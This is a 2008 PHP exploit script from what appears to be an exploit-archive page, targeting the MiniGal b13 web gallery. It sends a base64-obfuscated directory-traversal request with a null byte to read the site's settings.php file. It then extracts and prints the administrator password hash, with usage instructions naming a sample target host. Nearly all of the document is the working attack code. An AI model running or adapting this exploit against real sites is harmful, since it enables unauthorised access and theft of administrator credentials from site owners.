minigal-disclose.txt

Posted on 16 November 2008
<?php
set_time_limit(0);
function find_pass($data){
$pass = explode('$adminpass = "',$data);
if($pass[1]!=""){
echo("Vuln exploited enjoy !
");
sleep(1);
echo("Admin hash == [".substr($pass[1],0,32)."]
");
}
else{
echo("Exploit failed!!!!");
}
}
function __send($pack,$host,$port){
$ret = "";
$desc = fsockopen($host,$port,$errno, $errstr, 30);
if(!$desc){
echo("Socket say:($errno).[$errstr]");
return;
}
echo("Sending payload !!
");
fwrite($desc,$pack);
while(!feof($desc)){
$ret.=fgets($desc);
}
fclose($desc);
find_pass($ret);
flush();
}

echo("
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
".
"+       MiniGal b13 Source Code Disclosure       +
".
"+               Alfons Luja                      +
".
"+  --------------------------------------------  +
".
"+       Usage poc.php path host port             +
".
"+    ex: poc.php /press/ wwww.doda.net.pl 80     +
".
"+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
");

if($argc<3){ die("Path - host - Port - comprendo ?"); }

$path = $argv[1];
$host = $argv[2];
$port = $argv[3];

$packet = "GET ".$path.base64_decode("aW5kZXgucGhwP2xpc3Q9Li4vc2V0dGluZ3MucGhwJTAwIEhUVFAvMS4x")."
";
$packet .= "Host:".$host."
";
$packet .= "Keep-Alive: 300
";
$packet .= "Connection: keep-alive

";
echo("
Connecting to $host
");
__send($packet,$host,$port);

?>
TOP
Malware :

Last 20
Exploits :

Last 20